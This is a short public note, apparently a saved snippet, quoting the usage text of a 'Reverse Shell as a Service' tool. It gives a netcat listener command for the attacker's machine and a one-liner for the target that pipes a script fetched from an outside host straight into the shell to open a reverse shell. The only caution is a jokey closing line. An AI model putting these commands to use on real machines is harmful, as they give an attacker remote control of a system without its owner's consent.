View All Public Notes
"# Reverse Shell as a Service # https://github.com/lukechilds/reverse-shell # # 1. On your machine: # nc -l 1337 # # 2. On the target machine: # curl https://shell.now.sh/yourip:1337 | sh # # 3. Don't be a dick" #dev #geeky #interesting #pub